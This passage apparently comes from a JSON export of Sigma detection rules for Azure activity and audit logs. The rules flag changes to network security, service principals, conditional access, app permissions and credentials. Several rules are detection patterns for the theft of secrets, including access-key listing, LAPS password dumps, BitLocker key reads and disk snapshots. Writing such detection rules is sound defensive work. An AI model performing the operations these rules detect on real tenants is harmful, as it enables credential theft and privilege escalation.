    "content": "title: Azure Network Security Configuration Modified or Deleted\nid: d22b4df4-5a67-4859-a578-8c9a0b5af9df\nstatus: test\ndescription: Identifies when a network security configuration is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE\n            - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE\n            - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE\n            - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/DELETE\n            - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/JOIN/ACTION\n            - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE\n    condition: selection\nfalsepositives:\n    - Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_network_virtual_device_modified_or_deleted.yml",
    "content": "title: Azure Virtual Network Device Modified or Deleted\nid: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3\nstatus: test\ndescription: |\n    Identifies when a virtual network device is being modified or deleted.\n    This can be a network interface, network virtual appliance, virtual hub, or virtual router.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE\n            - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE\n            - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE\n            - MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION\n            - MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE\n            - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/DELETE\n            - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/WRITE\n            - MICROSOFT.NETWORK/VIRTUALHUBS/DELETE\n            - MICROSOFT.NETWORK/VIRTUALHUBS/WRITE\n            - MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE\n            - MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE\n    condition: selection\nfalsepositives:\n    - Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_new_cloudshell_created.yml",
    "content": "title: Azure New CloudShell Created\nid: 72af37e2-ec32-47dc-992b-bc288a2708cb\nstatus: test\ndescription: Identifies when a new Cloud Shell instance is created in the Azure portal.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer\ndate: 2021-09-21\nmodified: 2022-08-23\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName: MICROSOFT.PORTAL/CONSOLES/WRITE\n    condition: selection\nfalsepositives:\n    - A new Cloud Shell may be created by a system administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_owner_removed_from_application_or_service_principal.yml",
    "content": "title: Azure Owner Removed From Application or Service Principal\nid: 636e30d5-3736-42ea-96b1-e6e2f8429fd6\nstatus: test\ndescription: Identifies when an owner was removed from an application or service principal in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy\nauthor: Austin Songer @austinsonger\ndate: 2021-09-03\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message:\n            - Remove owner from service principal\n            - Remove owner from application\n    condition: selection\nfalsepositives:\n    - Owner being removed may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Owner removals by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_rare_operations.yml",
    "content": "title: Rare Subscription-level Operations In Azure\nid: c1182e02-49a3-481c-b3de-0fadc4091488\nstatus: test\ndescription: Identifies rare but sensitive subscription-level operations in Azure activity logs, such as listing the access keys of storage, Cosmos DB, Maps, Media Services or Cognitive Services accounts, creating disk snapshots, or writing network security groups. Listed keys can be used to access the data of those services directly, and snapshots can be used to extract sensitive data from disks.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml\nauthor: sawwinnnaung\ndate: 2020-05-07\nmodified: 2023-10-11\ntags:\n    - attack.t1003\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    keywords:\n        - Microsoft.DocumentDB/databaseAccounts/listKeys/action\n        - Microsoft.Maps/accounts/listKeys/action\n        - Microsoft.Media/mediaservices/listKeys/action\n        - Microsoft.CognitiveServices/accounts/listKeys/action\n        - Microsoft.Storage/storageAccounts/listKeys/action\n        - Microsoft.Compute/snapshots/write\n        - Microsoft.Network/networkSecurityGroups/write\n    condition: keywords\nfalsepositives:\n    - Valid change\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_service_principal_created.yml",
    "content": "title: Azure Service Principal Created\nid: 0ddcff6d-d262-40b0-804b-80eb592de8e3\nstatus: test\ndescription: Identifies when a service principal is created in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy\nauthor: Austin Songer @austinsonger\ndate: 2021-09-02\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message: 'Add service principal'\n    condition: selection\nfalsepositives:\n    - Service principal being created may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_service_principal_removed.yml",
    "content": "title: Azure Service Principal Removed\nid: 448fd1ea-2116-4c62-9cde-a92d120e0f08\nstatus: test\ndescription: Identifies when a service principal was removed in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy\nauthor: Austin Songer @austinsonger\ndate: 2021-09-03\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        properties.message: Remove service principal\n    condition: selection\nfalsepositives:\n    - Service principal being removed may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_subscription_permissions_elevation_via_activitylogs.yml",
    "content": "title: Azure Subscription Permission Elevation Via ActivityLogs\nid: 09438caa-07b1-4870-8405-1dbafe3dad95\nstatus: test\ndescription: |\n    Detects when a user has been elevated to manage all Azure Subscriptions.\n    This change should be investigated immediately if it isn't planned.\n    This setting could allow an attacker access to Azure subscriptions in your environment.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization\nauthor: Austin Songer @austinsonger\ndate: 2021-11-26\nmodified: 2022-08-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName: MICROSOFT.AUTHORIZATION/ELEVATEACCESS/ACTION\n    condition: selection\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_suppression_rule_created.yml",
    "content": "title: Azure Suppression Rule Created\nid: 92cc3e5d-eb57-419d-8c16-5c63f325a401\nstatus: test\ndescription: Identifies when a suppression rule is created in Azure. Adversaries could attempt this to evade detection.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer\ndate: 2021-08-16\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName: MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE\n    condition: selection\nfalsepositives:\n    - Suppression Rule being created may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_virtual_network_modified_or_deleted.yml",
    "content": "title: Azure Virtual Network Modified or Deleted\nid: bcfcc962-0e4a-4fd9-84bb-a833e672df3f\nstatus: test\ndescription: Identifies when a Virtual Network is modified or deleted in Azure.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName|startswith:\n            - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/\n            - MICROSOFT.NETWORK/VIRTUALNETWORKS/\n        operationName|endswith:\n            - /WRITE\n            - /DELETE\n    condition: selection\nfalsepositives:\n    - Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/activity_logs/azure_vpn_connection_modified_or_deleted.yml",
    "content": "title: Azure VPN Connection Modified or Deleted\nid: 61171ffc-d79c-4ae5-8e10-9323dba19cd3\nstatus: test\ndescription: Identifies when a VPN connection is modified or deleted.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nauthor: Austin Songer @austinsonger\ndate: 2021-08-08\nmodified: 2022-08-23\ntags:\n    - attack.impact\nlogsource:\n    product: azure\n    service: activitylogs\ndetection:\n    selection:\n        operationName:\n            - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE\n            - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/DELETE\n    condition: selection\nfalsepositives:\n    - VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_removedby_bad_actor.yml",
    "content": "title: CA Policy Removed by Non Approved Actor\nid: 26e7c5e2-6545-481e-b7e6-050143459635\nstatus: test\ndescription: Monitor and alert on conditional access changes where non approved actor removed CA Policy.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access\nauthor: Corissa Koopmans, '@corissalea'\ndate: 2022-07-19\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548\n    - attack.t1556\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Delete conditional access policy\n    condition: selection\nfalsepositives:\n    - Misconfigured role permissions\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_updatedby_bad_actor.yml",
    "content": "title: CA Policy Updated by Non Approved Actor\nid: 50a3c7aa-ec29-44a4-92c1-fce229eef6fc\nstatus: test\ndescription: Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare \"old\" vs \"new\" value.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access\nauthor: Corissa Koopmans, '@corissalea'\ndate: 2022-07-19\nmodified: 2024-05-28\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548\n    - attack.t1556\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Update conditional access policy\n    condition: selection\nfalsepositives:\n    - Misconfigured role permissions\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml",
    "content": "title: New CA Policy by Non-approved Actor\nid: 0922467f-db53-4348-b7bf-dee8d0d348c6\nstatus: test\ndescription: Monitor and alert on conditional access changes.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure\nauthor: Corissa Koopmans, '@corissalea'\ndate: 2022-07-18\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Add conditional access policy\n    condition: selection\nfalsepositives:\n    - Misconfigured role permissions\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_account_created_deleted.yml",
    "content": "title: Account Created And Deleted Within A Close Time Frame\nid: 6f583da0-3a90-4566-a4ed-83c09fe18bbf\nstatus: test\ndescription: Detects when an account was created and deleted in a short period of time.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#short-lived-accounts\nauthor: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton\ndate: 2022-08-11\nmodified: 2022-08-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Add user\n            - Delete user\n        Status: Success\n    condition: selection\nfalsepositives:\n    - Legit administrative action\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_bitlocker_key_retrieval.yml",
    "content": "title: Bitlocker Key Retrieval\nid: a0413867-daf3-43dd-9245-734b3a787942\nstatus: test\ndescription: Monitor and alert for Bitlocker key retrieval.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval\nauthor: Michael Epping, '@mepples21'\ndate: 2022-06-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: KeyManagement\n        OperationName: Read BitLocker key\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_certificate_based_authencation_enabled.yml",
    "content": "title: Certificate-Based Authentication Enabled\nid: c2496b41-16a9-4016-a776-b23f8910dc58\nstatus: test\ndescription: Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.\nreferences:\n    - https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f\n    - https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/\nauthor: Harjot Shah Singh, '@cyb3rjy0t'\ndate: 2024-03-26\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1556\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        OperationName: 'Authentication Methods Policy Update'\n        TargetResources.modifiedProperties|contains: 'AuthenticationMethodsPolicy'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_device_registration_policy_changes.yml",
    "content": "title: Changes to Device Registration Policy\nid: 9494bff8-959f-4440-bbce-fb87a208d517\nstatus: test\ndescription: Monitor and alert for changes to the device registration policy.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy\nauthor: Michael Epping, '@mepples21'\ndate: 2022-06-28\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: 'Policy'\n        ActivityDisplayName: 'Set device registration policies'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml",
    "content": "title: Guest Users Invited To Tenant By Non Approved Inviters\nid: 4ad97bf5-a514-41a4-abd3-4f3455ad4865\nstatus: test\ndescription: Detects guest users being invited to tenant by non-approved inviters\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-07-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: 'UserManagement'\n        OperationName: 'Invite external user'\n    filter:\n        InitiatedBy|contains: '<approved guest inviter use OR for multiple>'\n    condition: selection and not filter\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_new_root_ca_added.yml",
    "content": "title: New Root Certificate Authority Added\nid: 4bb80281-3756-4ec8-a88e-523c5a6fda9e\nstatus: test\ndescription: Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.\nreferences:\n    - https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f\n    - https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/\nauthor: Harjot Shah Singh, '@cyb3rjy0t'\ndate: 2024-03-26\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1556\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        OperationName: 'Set Company Information'\n        TargetResources.modifiedProperties.newValue|contains: 'TrustedCAsForPasswordlessAuth'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_ad_users_added_to_device_admin_roles.yml",
    "content": "title: Users Added to Global or Device Admin Roles\nid: 11c767ae-500b-423b-bae3-b234450736ed\nstatus: test\ndescription: Monitor and alert for users added to device admin roles.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-administrator-roles\nauthor: Michael Epping, '@mepples21'\ndate: 2022-06-28\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: RoleManagement\n        OperationName|contains|all:\n            - 'Add'\n            - 'member to role'\n        TargetResources|contains:\n            - '7698a772-787b-4ac8-901f-60d6b08affd2'\n            - '62e90394-69f5-4237-9190-012177145e10'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_appid_uri_changes.yml",
    "content": "title: Application AppID Uri Configuration Changes\nid: 1b45b0d1-773f-4f23-aedc-814b759563b1\nstatus: test\ndescription: Detects when a configuration change is made to an application's AppID URI.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed\nauthor: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'\ndate: 2022-06-02\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.credential-access\n    - attack.privilege-escalation\n    - attack.t1552\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Update Application\n            - Update Service principal\n    condition: selection\nfalsepositives:\n    - When an administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_credential_added.yml",
    "content": "title: Added Credentials to Existing Application\nid: cbb67ecc-fb70-4467-9350-c910bdf7c628\nstatus: test\ndescription: Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials\nauthor: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'\ndate: 2022-05-26\nmodified: 2025-07-18\ntags:\n    - attack.privilege-escalation\n    - attack.t1098.001\n    - attack.persistence\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Update application – Certificates and secrets management\n            - Update Service principal/Update Application\n    condition: selection\nfalsepositives:\n    - When credentials are added/removed as part of the normal working hours/workflows\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_delegated_permissions_all_users.yml",
    "content": "title: Delegated Permissions Granted For All Users\nid: a6355fbe-f36f-45d8-8efc-ab42465cbc52\nstatus: test\ndescription: Detects when highly privileged delegated permissions are granted on behalf of all users\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022-07-28\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Add delegated permission grant\n    condition: selection\nfalsepositives:\n    - When the permission is legitimately needed for the app\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_end_user_consent.yml",
    "content": "title: End User Consent\nid: 9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a\nstatus: test\ndescription: Detects when an end user consents to an application\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-consent\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022-07-28\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        ConsentContext.IsAdminConsent: 'false'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_end_user_consent_blocked.yml",
    "content": "title: End User Consent Blocked\nid: 7091372f-623c-4293-bc37-20c32b3492be\nstatus: test\ndescription: Detects when end user consent is blocked due to risk-based consent.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-stopped-due-to-risk-based-consent\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022-07-10\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        failure_status_reason: 'Microsoft.online.Security.userConsentBlockedForRiskyAppsExceptions'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_owner_added.yml",
    "content": "title: Added Owner To Application\nid: 74298991-9fc4-460e-a92e-511aa60baec1\nstatus: test\ndescription: Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#new-owner\nauthor: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'\ndate: 2022-06-02\ntags:\n    - attack.t1552\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Add owner to application\n    condition: selection\nfalsepositives:\n    - When a new application owner is added by an administrator\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_permissions_msft.yml",
    "content": "title: App Granted Microsoft Permissions\nid: c1d147ae-a951-48e5-8b41-dcd0170c7213\nstatus: test\ndescription: Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022-07-10\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Add delegated permission grant\n            - Add app role assignment to service principal\n    condition: selection\nfalsepositives:\n    - When the permission is legitimately needed for the app\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_privileged_permissions.yml",
    "content": "title: App Granted Privileged Delegated Or App Permissions\nid: 5aecf3d5-f8a0-48e7-99be-3a759df7358f\nrelated:\n    - id: ba2a7c80-027b-460f-92e2-57d113897dbc\n      type: obsolete\nstatus: test\ndescription: Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022-07-28\nmodified: 2023-03-29\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098.003\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Add app role assignment to service principal\n    condition: selection\nfalsepositives:\n    - When the permission is legitimately needed for the app\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_role_added.yml",
    "content": "title: App Assigned To Azure RBAC/Microsoft Entra Role\nid: b04934b2-0a68-4845-8a19-bdfed3a68a7a\nstatus: test\ndescription: Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role\nauthor: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'\ndate: 2022-07-19\nmodified: 2024-11-04\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098.003\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        targetResources.type: 'Service Principal'\n        properties.message:\n            - Add member to role\n            - Add eligible member to role\n            - Add scoped member to role\n    condition: selection\nfalsepositives:\n    - When the permission is legitimately needed for the app\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_app_uri_modifications.yml",
    "content": "title: Application URI Configuration Changes\nid: 0055ad1f-be85-4798-83cf-a6da17c993b3\nstatus: test\ndescription: |\n    Detects when a configuration change is made to an application's URI.\n    URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, or URIs that point to domains you do not control should be investigated.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-configuration-changes\nauthor: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'\ndate: 2022-06-02\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1528\n    - attack.t1078.004\n    - attack.persistence\n    - attack.credential-access\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Update Application Sucess- Property Name AppAddress\n    condition: selection\nfalsepositives:\n    - When an administrator is making legitimate URI configuration changes to an application. This should be a planned event.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_auditlogs_laps_credential_dumping.yml",
    "content": "title: Windows LAPS Credential Dump From Entra ID\nid: a4b25073-8947-489c-a8dd-93b41c23f26d\nstatus: test\ndescription: Detects when an account dumps the LAPS password from Entra ID.\nreferences:\n    - https://twitter.com/NathanMcNulty/status/1785051227568632263\n    - https://www.cloudcoffee.ch/microsoft-365/configure-windows-laps-in-microsoft-intune/\n    - https://techcommunity.microsoft.com/t5/microsoft-entra-blog/introducing-windows-local-administrator-password-solution-with/ba-p/1942487\nauthor: andrewdanis\ndate: 2024-06-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098.005\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        category: 'Device'\n        activityType|contains: 'Recover device local administrator password'\n        additionalDetails.additionalInfo|contains: 'Successfully recovered local credential by device id'\n    condition: selection\nfalsepositives:\n    - Approved activity performed by an Administrator.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_change_to_authentication_method.yml",
